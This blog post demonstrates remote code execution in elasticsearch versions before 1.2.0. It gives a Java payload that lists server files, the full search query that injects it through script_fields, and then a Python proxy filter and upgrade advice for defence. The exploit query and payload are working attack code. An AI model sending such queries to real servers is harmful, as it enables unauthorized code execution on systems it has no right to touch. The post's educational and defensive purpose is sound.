This week I had to look into elasticsearch. Simply put, it is a search engine with a simple-to-use interface – interface as in REST API, I mean. Searching is done by crafting query strings in JSON, so it goes hand in hand with JavaScript. Installation is just unzipping it, starting it and then indexing to your heart's desire. Java based, you know.

Scouring through the product website I found out that there’s a vulnerability listing. So I went through it and behold, interesting things ahead!

Today I am going to show you how to exploit older versions of elasticsearch. Why? Because developers need to know this. It shows how important it is to run updated software and to stay current with your technology stack.

Affected versions

According to the documentation, anything prior to the 1.2.0 release. Tested with 1.1.1 and 1.1.2 – which were released in April and May 2014, respectively.

Tools needed

We don’t need many tools for this. Only

  • Chrome
  • Sense plugin/extension for easy elasticsearch interaction (rumor has it that it has been withdrawn from circulation).
    — OR —
    Marvel Sense – which can be installed as a plugin to your elasticsearch instance.
    — OR —
    Just use Chrome or curl.
  • Java JDK (for when you want to confirm your Java code is working)

You might want to keep the elasticsearch documentation nearby if you don’t know this tool well.

Resources

More information about the security hole can be found here

Payload

First we need a payload. This payload is just plain old Java and is meant to be injected into the JSON search query. For this example I am just listing the files in the current folder. I could have crafted it to be more malicious – I don’t want or need to do that.

You might want to edit the payload in Notepad or similar and then compile it just to make sure your code is dandy.

import java.io.File;
String d = '';
File dir = new File('.');          // the server's working directory
File[] files = dir.listFiles();

for (File file : files) {
    d += ',' + file.getName();     // collect the file names into one string
}
return d;                          // this becomes the value of the script field

Exploit

This exploit can be executed straight through Sense in Chrome (or one of the other tools, slight customization may apply). If you are unfamiliar with how elasticsearch works, here’s a small heads-up. You write queries in JSON format. Here I simply search for anything available in the index. You can also include custom scripts in the query, which elasticsearch evaluates to manipulate or add to the result. Looking at “script_fields” we see two interesting things. First, the “script” section, which holds the script I want to inject. Second, “payloadresult”, which is the name of the field that holds the result generated by the script.

Just execute this in Sense and look at the result. Bam! Directory listing.

GET _search
{
  "query": { "match_all": {} },
  "script_fields": {
    "payloadresult": {
      "script": "import java.io.File; String d='';File dir = new File('.');File[] files=dir.listFiles(); for(File file:files) { d+=','+file.getName();} return d;"
    }
  }
}

Secure your elasticsearch instance

The documentation states that elasticsearch should not be made public. elasticsearch listens on ports 9200 and 9300, which by default are open to everyone. There’s no login or anything – nothing is going to hold you back. I recommend putting a proxy or similar in front of it to restrict how users interact with it. More information can be found on their website.
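As an added example (not from the post or the elasticsearch project), here is the kind of check a fronting proxy could apply to _search bodies: it walks the JSON and refuses any request that asks for a script to be evaluated, which is exactly what the query above does. It assumes the proxy can read the request body before forwarding it, and the key names it looks for are the ones elasticsearch used at the time of the post.

```python
import json

# Keys whose values pre-1.2 elasticsearch evaluates as a dynamic script. The
# post uses "script_fields"; a bare "script" key also covers script filters
# and script_score. Over-broad by design: a document field literally named
# "script" inside a term query would be refused as well.
SCRIPT_KEYS = ("script", "script_fields")


def find_scripts(node, path="$"):
    """Return the JSON paths in a query body where a script would be evaluated."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key in SCRIPT_KEYS:
                hits.append(child)
            hits.extend(find_scripts(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_scripts(item, f"{path}[{i}]"))
    return hits


def filter_search_request(raw_body):
    """Decide whether a _search body may be forwarded: returns (allowed, reason)."""
    if not raw_body.strip():          # GET _search with no body is a plain match_all
        return True, "ok"
    try:
        body = json.loads(raw_body)
    except ValueError:
        return False, "body is not valid JSON"
    hits = find_scripts(body)
    if hits:
        return False, "script evaluation requested at " + ", ".join(hits)
    return True, "ok"


# Constructed sample bodies: the first has the shape of the post's exploit
# query (script text replaced by a placeholder), the second is an ordinary search.
EXPLOIT_BODY = json.dumps({
    "query": {"match_all": {}},
    "script_fields": {"payloadresult": {"script": "<script from the post>"}},
})
BENIGN_BODY = json.dumps({"query": {"match_all": {}}, "size": 10})

if __name__ == "__main__":
    for name, body in (("exploit", EXPLOIT_BODY), ("benign", BENIGN_BODY)):
        print(name, filter_search_request(body))
```

This is a stop-gap that only covers what reaches the proxy; the real fix remains upgrading past 1.2.0, where elasticsearch disabled dynamic scripting by default.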

And of course – always stay up to date on current release(s). Happily, the elasticsearch people are open about their vulnerabilities, and I applaud them for that; they also give great advice on utilizing this marvelous tool.

This security hole is fixed in later editions of elasticsearch. So – hopefully you now know why it is important to be up to speed on your technology stack.